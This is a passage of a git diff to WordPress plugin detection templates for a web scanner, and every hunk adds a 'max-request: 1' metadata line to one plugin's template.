https://wpscan.com/plugin/ga-google-analytics tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml index 22bfa3ffe2..f4123bb594 100644 --- a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml +++ b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/gdpr-cookie-compliance/ metadata: + max-request: 1 plugin_namespace: gdpr-cookie-compliance wpscan: https://wpscan.com/plugin/gdpr-cookie-compliance tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml index 7ed171d662..254f916291 100644 --- a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/google-analytics-dashboard-for-wp/ metadata: + max-request: 1 plugin_namespace: google-analytics-dashboard-for-wp wpscan: https://wpscan.com/plugin/google-analytics-dashboard-for-wp tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml index ad238445fc..8074ac337e 100644 --- a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/google-analytics-for-wordpress/ metadata: + max-request: 1 plugin_namespace: google-analytics-for-wordpress wpscan: https://wpscan.com/plugin/google-analytics-for-wordpress tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml index 7161671960..b9de0ee313 100644 --- a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml +++ b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/google-listings-and-ads/ metadata: + max-request: 1 plugin_namespace: google-listings-and-ads wpscan: https://wpscan.com/plugin/google-listings-and-ads tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/google-site-kit.yaml b/http/technologies/wordpress/plugins/google-site-kit.yaml index 2678f603c6..7b0f188ff7 100644 --- a/http/technologies/wordpress/plugins/google-site-kit.yaml +++ b/http/technologies/wordpress/plugins/google-site-kit.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/google-site-kit/ metadata: + max-request: 1 plugin_namespace: google-site-kit wpscan: https://wpscan.com/plugin/google-site-kit tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml index 20d947a5d1..898e4de56d 100644 --- a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml +++ b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/google-sitemap-generator/ metadata: + max-request: 1 plugin_namespace: google-sitemap-generator wpscan: https://wpscan.com/plugin/google-sitemap-generator tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/gtranslate.yaml b/http/technologies/wordpress/plugins/gtranslate.yaml index 22ee97b51f..4a76856a69 100644 --- a/http/technologies/wordpress/plugins/gtranslate.yaml +++ b/http/technologies/wordpress/plugins/gtranslate.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/gtranslate/ metadata: + max-request: 1 plugin_namespace: gtranslate wpscan: https://wpscan.com/plugin/gtranslate tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/gutenberg.yaml b/http/technologies/wordpress/plugins/gutenberg.yaml index 3f4c6c8936..b321ca63eb 100644 --- a/http/technologies/wordpress/plugins/gutenberg.yaml +++ b/http/technologies/wordpress/plugins/gutenberg.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/gutenberg/ metadata: + max-request: 1 plugin_namespace: gutenberg wpscan: https://wpscan.com/plugin/gutenberg tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml index fa1bb64115..2b42c9f80c 100644 --- a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml +++ b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/happy-elementor-addons/ metadata: + max-request: 1 plugin_namespace: happy-elementor-addons wpscan: https://wpscan.com/plugin/happy-elementor-addons tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/header-and-footer-scripts.yaml b/http/technologies/wordpress/plugins/header-and-footer-scripts.yaml index a8eca7b056..2409c6b370 100644 --- a/http/technologies/wordpress/plugins/header-and-footer-scripts.yaml +++ b/http/technologies/wordpress/plugins/header-and-footer-scripts.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/header-and-footer-scripts/ metadata: + max-request: 1 plugin_namespace: header-and-footer-scripts wpscan: https://wpscan.com/plugin/header-and-footer-scripts tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml index da63d1cbf6..dbea07a6da 100644 --- a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml +++ b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/header-footer-code-manager/ metadata: + max-request: 1 plugin_namespace: header-footer-code-manager wpscan: https://wpscan.com/plugin/header-footer-code-manager tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/header-footer-elementor.yaml b/http/technologies/wordpress/plugins/header-footer-elementor.yaml index f94e7f6494..17a8f220cf 100644 --- a/http/technologies/wordpress/plugins/header-footer-elementor.yaml +++ b/http/technologies/wordpress/plugins/header-footer-elementor.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/header-footer-elementor/ metadata: + max-request: 1 plugin_namespace: header-footer-elementor wpscan: https://wpscan.com/plugin/header-footer-elementor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/header-footer.yaml b/http/technologies/wordpress/plugins/header-footer.yaml index 95d2aa5f16..956a08b32d 100644 --- a/http/technologies/wordpress/plugins/header-footer.yaml +++ b/http/technologies/wordpress/plugins/header-footer.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/header-footer/ metadata: + max-request: 1 plugin_namespace: header-footer wpscan: https://wpscan.com/plugin/header-footer tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/health-check.yaml b/http/technologies/wordpress/plugins/health-check.yaml index af8193b875..5a570b9077 100644 --- a/http/technologies/wordpress/plugins/health-check.yaml +++ b/http/technologies/wordpress/plugins/health-check.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/health-check/ metadata: + max-request: 1 plugin_namespace: health-check wpscan: https://wpscan.com/plugin/health-check tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/hello-dolly.yaml b/http/technologies/wordpress/plugins/hello-dolly.yaml index 8d7e45818b..4ecac0cd92 100644 --- a/http/technologies/wordpress/plugins/hello-dolly.yaml +++ b/http/technologies/wordpress/plugins/hello-dolly.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/hello-dolly/ metadata: + max-request: 1 plugin_namespace: hello-dolly wpscan: https://wpscan.com/plugin/hello-dolly tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/host-webfonts-local.yaml b/http/technologies/wordpress/plugins/host-webfonts-local.yaml index ed3967db7b..e50f58cef8 100644 --- a/http/technologies/wordpress/plugins/host-webfonts-local.yaml +++ b/http/technologies/wordpress/plugins/host-webfonts-local.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/host-webfonts-local/ metadata: + max-request: 1 plugin_namespace: host-webfonts-local wpscan: https://wpscan.com/plugin/host-webfonts-local tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/imagify.yaml b/http/technologies/wordpress/plugins/imagify.yaml index 2ff5adba86..031bb48563 100644 --- a/http/technologies/wordpress/plugins/imagify.yaml +++ b/http/technologies/wordpress/plugins/imagify.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/imagify/ metadata: + max-request: 1 plugin_namespace: imagify wpscan: https://wpscan.com/plugin/imagify tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/imsanity.yaml b/http/technologies/wordpress/plugins/imsanity.yaml index 9099f3c0a5..3cdcf3da93 100644 --- a/http/technologies/wordpress/plugins/imsanity.yaml +++ b/http/technologies/wordpress/plugins/imsanity.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/imsanity/ metadata: + max-request: 1 plugin_namespace: imsanity wpscan: https://wpscan.com/plugin/imsanity tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml index 1ee0e67542..c222bc9d4a 100644 --- a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml +++ b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/insert-headers-and-footers/ metadata: + max-request: 1 plugin_namespace: insert-headers-and-footers wpscan: https://wpscan.com/plugin/insert-headers-and-footers tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/instagram-feed.yaml b/http/technologies/wordpress/plugins/instagram-feed.yaml index 43cb2ab09c..c8acf8c625 100644 --- a/http/technologies/wordpress/plugins/instagram-feed.yaml +++ b/http/technologies/wordpress/plugins/instagram-feed.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/instagram-feed/ metadata: + max-request: 1 plugin_namespace: instagram-feed wpscan: https://wpscan.com/plugin/instagram-feed tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml index 7ba81036cf..66b7d6a363 100644 --- a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/intuitive-custom-post-order/ metadata: + max-request: 1 plugin_namespace: intuitive-custom-post-order wpscan: https://wpscan.com/plugin/intuitive-custom-post-order tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/iwp-client.yaml b/http/technologies/wordpress/plugins/iwp-client.yaml index 24fc3e3295..a36016562d 100644 --- a/http/technologies/wordpress/plugins/iwp-client.yaml +++ b/http/technologies/wordpress/plugins/iwp-client.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/iwp-client/ metadata: + max-request: 1 plugin_namespace: iwp-client wpscan: https://wpscan.com/plugin/iwp-client tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/jetpack-boost.yaml b/http/technologies/wordpress/plugins/jetpack-boost.yaml index 3e89505574..8033aacbc6 100644 --- a/http/technologies/wordpress/plugins/jetpack-boost.yaml +++ b/http/technologies/wordpress/plugins/jetpack-boost.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/jetpack-boost/ metadata: + max-request: 1 plugin_namespace: jetpack-boost wpscan: https://wpscan.com/plugin/jetpack-boost tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/jetpack.yaml b/http/technologies/wordpress/plugins/jetpack.yaml index e701e365ba..e4017b1a0a 100644 --- a/http/technologies/wordpress/plugins/jetpack.yaml +++ b/http/technologies/wordpress/plugins/jetpack.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/jetpack/ metadata: + max-request: 1 plugin_namespace: jetpack wpscan: https://wpscan.com/plugin/jetpack tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/kadence-blocks.yaml b/http/technologies/wordpress/plugins/kadence-blocks.yaml index c0cc5400a8..53d6d393bd 100644 --- a/http/technologies/wordpress/plugins/kadence-blocks.yaml +++ b/http/technologies/wordpress/plugins/kadence-blocks.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/kadence-blocks/ metadata: + max-request: 1 plugin_namespace: kadence-blocks wpscan: https://wpscan.com/plugin/kadence-blocks tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/kirki.yaml b/http/technologies/wordpress/plugins/kirki.yaml index 22687bcffe..c286e9a14f 100644 --- a/http/technologies/wordpress/plugins/kirki.yaml +++ b/http/technologies/wordpress/plugins/kirki.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/kirki/ metadata: + max-request: 1 plugin_namespace: kirki wpscan: https://wpscan.com/plugin/kirki tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/leadin.yaml b/http/technologies/wordpress/plugins/leadin.yaml index b69d3d5bfe..364e3cd71e 100644 --- a/http/technologies/wordpress/plugins/leadin.yaml +++ b/http/technologies/wordpress/plugins/leadin.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/leadin/ metadata: + max-request: 1 plugin_namespace: leadin wpscan: https://wpscan.com/plugin/leadin tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml index 7975a57702..4fcccbfc33 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/limit-login-attempts-reloaded/ metadata: + max-request: 1 plugin_namespace: limit-login-attempts-reloaded wpscan: https://wpscan.com/plugin/limit-login-attempts-reloaded tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/limit-login-attempts.yaml b/http/technologies/wordpress/plugins/limit-login-attempts.yaml index ff4cef94d7..3fbc714d3b 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/limit-login-attempts/ metadata: + max-request: 1 plugin_namespace: limit-login-attempts wpscan: https://wpscan.com/plugin/limit-login-attempts tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/litespeed-cache.yaml b/http/technologies/wordpress/plugins/litespeed-cache.yaml index a8903697b0..c49b506979 100644 --- a/http/technologies/wordpress/plugins/litespeed-cache.yaml +++ b/http/technologies/wordpress/plugins/litespeed-cache.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/litespeed-cache/ metadata: + max-request: 1 plugin_namespace: litespeed-cache wpscan: https://wpscan.com/plugin/litespeed-cache tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/loco-translate.yaml b/http/technologies/wordpress/plugins/loco-translate.yaml index 3f141c4476..dfcaf6f71b 100644 --- a/http/technologies/wordpress/plugins/loco-translate.yaml +++ b/http/technologies/wordpress/plugins/loco-translate.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/loco-translate/ metadata: + max-request: 1 plugin_namespace: loco-translate wpscan: https://wpscan.com/plugin/loco-translate tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/loginizer.yaml b/http/technologies/wordpress/plugins/loginizer.yaml index 5355e988a2..61be246fee 100644 --- a/http/technologies/wordpress/plugins/loginizer.yaml +++ b/http/technologies/wordpress/plugins/loginizer.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/loginizer/ metadata: + max-request: 1 plugin_namespace: loginizer wpscan: https://wpscan.com/plugin/loginizer tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/loginpress.yaml b/http/technologies/wordpress/plugins/loginpress.yaml index 6f06b49011..1c16a72d76 100644 --- a/http/technologies/wordpress/plugins/loginpress.yaml +++ b/http/technologies/wordpress/plugins/loginpress.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/loginpress/ metadata: + max-request: 1 plugin_namespace: loginpress wpscan: https://wpscan.com/plugin/loginpress tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml index 53d409fb68..50d2e6630b 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/mailchimp-for-woocommerce/ metadata: + max-request: 1 plugin_namespace: mailchimp-for-woocommerce wpscan: https://wpscan.com/plugin/mailchimp-for-woocommerce tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml index 0e908a9580..8d71f7bde9 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/mailchimp-for-wp/ metadata: + max-request: 1 plugin_namespace: mailchimp-for-wp wpscan: https://wpscan.com/plugin/mailchimp-for-wp tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/mailpoet.yaml b/http/technologies/wordpress/plugins/mailpoet.yaml index aeb1875c57..5e1f97086e 100644 --- a/http/technologies/wordpress/plugins/mailpoet.yaml +++ b/http/technologies/wordpress/plugins/mailpoet.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/mailpoet/ metadata: + max-request: 1 plugin_namespace: mailpoet wpscan: https://wpscan.com/plugin/mailpoet tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/maintenance.yaml b/http/technologies/wordpress/plugins/maintenance.yaml index 7c15702305..d87d456a8c 100644 --- a/http/technologies/wordpress/plugins/maintenance.yaml +++ b/http/technologies/wordpress/plugins/maintenance.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/maintenance/ metadata: + max-request: 1 plugin_namespace: maintenance wpscan: https://wpscan.com/plugin/maintenance tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/mainwp-child.yaml b/http/technologies/wordpress/plugins/mainwp-child.yaml index 5ce87e6c71..aa9153241e 100644 --- a/http/technologies/wordpress/plugins/mainwp-child.yaml +++ b/http/technologies/wordpress/plugins/mainwp-child.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/mainwp-child/ metadata: + max-request: 1 plugin_namespace: mainwp-child wpscan: https://wpscan.com/plugin/mainwp-child tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/malcare-security.yaml b/http/technologies/wordpress/plugins/malcare-security.yaml index c342e6b45a..09641796a3 100644 --- a/http/technologies/wordpress/plugins/malcare-security.yaml +++ b/http/technologies/wordpress/plugins/malcare-security.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/malcare-security/ metadata: + max-request: 1 plugin_namespace: malcare-security wpscan: https://wpscan.com/plugin/malcare-security tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/megamenu.yaml b/http/technologies/wordpress/plugins/megamenu.yaml index e95041f555..28b70d09bf 100644 --- a/http/technologies/wordpress/plugins/megamenu.yaml +++ b/http/technologies/wordpress/plugins/megamenu.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/megamenu/ metadata: + max-request: 1 plugin_namespace: megamenu wpscan: https://wpscan.com/plugin/megamenu tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/members.yaml b/http/technologies/wordpress/plugins/members.yaml index 879a0d1c12..b43c10ed7a 100644 --- a/http/technologies/wordpress/plugins/members.yaml +++ b/http/technologies/wordpress/plugins/members.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/members/ metadata: + max-request: 1 plugin_namespace: members wpscan: https://wpscan.com/plugin/members tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/meta-box.yaml b/http/technologies/wordpress/plugins/meta-box.yaml index 985f5d373a..eb7e78bc7f 100644 --- a/http/technologies/wordpress/plugins/meta-box.yaml +++ b/http/technologies/wordpress/plugins/meta-box.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/meta-box/ metadata: + max-request: 1 plugin_namespace: meta-box wpscan: https://wpscan.com/plugin/meta-box tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/ml-slider.yaml b/http/technologies/wordpress/plugins/ml-slider.yaml index bbc305b8de..3da2ea50e1 100644 --- a/http/technologies/wordpress/plugins/ml-slider.yaml +++ b/http/technologies/wordpress/plugins/ml-slider.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/ml-slider/ metadata: + max-request: 1 plugin_namespace: ml-slider wpscan: https://wpscan.com/plugin/ml-slider tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/newsletter.yaml b/http/technologies/wordpress/plugins/newsletter.yaml index 7e3e4e2d7e..7a58c58f63 100644 --- a/http/technologies/wordpress/plugins/newsletter.yaml +++ b/http/technologies/wordpress/plugins/newsletter.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/newsletter/ metadata: + max-request: 1 plugin_namespace: newsletter wpscan: https://wpscan.com/plugin/newsletter tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml index 17ea142c46..5f99b8cac8 100644 --- a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml +++ b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/nextend-facebook-connect/ metadata: + max-request: 1 plugin_namespace: nextend-facebook-connect wpscan: https://wpscan.com/plugin/nextend-facebook-connect tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/nextgen-gallery.yaml b/http/technologies/wordpress/plugins/nextgen-gallery.yaml index 953e4ab3d8..b08876df04 100644 --- a/http/technologies/wordpress/plugins/nextgen-gallery.yaml +++ b/http/technologies/wordpress/plugins/nextgen-gallery.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/nextgen-gallery/ metadata: + max-request: 1 plugin_namespace: nextgen-gallery wpscan: https://wpscan.com/plugin/nextgen-gallery tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/ninja-forms.yaml b/http/technologies/wordpress/plugins/ninja-forms.yaml index 92107fa69c..3f68dffe06 100644 --- a/http/technologies/wordpress/plugins/ninja-forms.yaml +++ b/http/technologies/wordpress/plugins/ninja-forms.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/ninja-forms/ metadata: + max-request: 1 plugin_namespace: ninja-forms wpscan: https://wpscan.com/plugin/ninja-forms tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/ocean-extra.yaml b/http/technologies/wordpress/plugins/ocean-extra.yaml index 5e1fe4ef5c..34f9bde1d6 100644 --- a/http/technologies/wordpress/plugins/ocean-extra.yaml +++ b/http/technologies/wordpress/plugins/ocean-extra.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/ocean-extra/ metadata: + max-request: 1 plugin_namespace: ocean-extra wpscan: https://wpscan.com/plugin/ocean-extra tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml index 74fb3e6010..d9f645328f 100644 --- a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml +++ b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/official-facebook-pixel/ metadata: + max-request: 1 plugin_namespace: official-facebook-pixel wpscan: https://wpscan.com/plugin/official-facebook-pixel tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/one-click-demo-import.yaml b/http/technologies/wordpress/plugins/one-click-demo-import.yaml index b9f70ba555..8a1196fc9f 100644 --- a/http/technologies/wordpress/plugins/one-click-demo-import.yaml +++ b/http/technologies/wordpress/plugins/one-click-demo-import.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/one-click-demo-import/ metadata: + max-request: 1 plugin_namespace: one-click-demo-import wpscan: https://wpscan.com/plugin/one-click-demo-import tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/optinmonster.yaml b/http/technologies/wordpress/plugins/optinmonster.yaml index 6486c02c9a..05025452b7 100644 --- a/http/technologies/wordpress/plugins/optinmonster.yaml +++ b/http/technologies/wordpress/plugins/optinmonster.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/optinmonster/ metadata: + max-request: 1 plugin_namespace: optinmonster wpscan: https://wpscan.com/plugin/optinmonster tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/otter-blocks.yaml b/http/technologies/wordpress/plugins/otter-blocks.yaml index 81f58198d3..1db1b57708 100644 --- a/http/technologies/wordpress/plugins/otter-blocks.yaml +++ b/http/technologies/wordpress/plugins/otter-blocks.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/otter-blocks/ metadata: + max-request: 1 plugin_namespace: otter-blocks wpscan: https://wpscan.com/plugin/otter-blocks tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/password-protected.yaml b/http/technologies/wordpress/plugins/password-protected.yaml index 3743307dbc..dafe6974f6 100644 --- a/http/technologies/wordpress/plugins/password-protected.yaml +++ b/http/technologies/wordpress/plugins/password-protected.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/password-protected/ metadata: + max-request: 1 plugin_namespace: password-protected wpscan: https://wpscan.com/plugin/password-protected tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/pdf-embedder.yaml b/http/technologies/wordpress/plugins/pdf-embedder.yaml index a4c6980041..ba05fb1e16 100644 --- a/http/technologies/wordpress/plugins/pdf-embedder.yaml +++ b/http/technologies/wordpress/plugins/pdf-embedder.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/pdf-embedder/ metadata: + max-request: 1 plugin_namespace: pdf-embedder wpscan: https://wpscan.com/plugin/pdf-embedder tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/pixelyoursite.yaml b/http/technologies/wordpress/plugins/pixelyoursite.yaml index adf3387ddb..7f98d822a8 100644 --- a/http/technologies/wordpress/plugins/pixelyoursite.yaml +++ b/http/technologies/wordpress/plugins/pixelyoursite.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/pixelyoursite/ metadata: + max-request: 1 plugin_namespace: pixelyoursite wpscan: https://wpscan.com/plugin/pixelyoursite tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/polylang.yaml b/http/technologies/wordpress/plugins/polylang.yaml index eb6e1aaa5d..89602f4264 100644 --- a/http/technologies/wordpress/plugins/polylang.yaml +++ b/http/technologies/wordpress/plugins/polylang.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/polylang/ metadata: + max-request: 1 plugin_namespace: polylang wpscan: https://wpscan.com/plugin/polylang tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/popup-builder.yaml b/http/technologies/wordpress/plugins/popup-builder.yaml index b3c83cd0bf..2f6513ca42 100644 --- a/http/technologies/wordpress/plugins/popup-builder.yaml +++ b/http/technologies/wordpress/plugins/popup-builder.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/popup-builder/ metadata: + max-request: 1 plugin_namespace: popup-builder wpscan: https://wpscan.com/plugin/popup-builder tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/popup-maker.yaml b/http/technologies/wordpress/plugins/popup-maker.yaml index 96d8bd6aca..982306b13c 100644 --- a/http/technologies/wordpress/plugins/popup-maker.yaml +++ b/http/technologies/wordpress/plugins/popup-maker.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/popup-maker/ metadata: + max-request: 1 plugin_namespace: popup-maker wpscan: 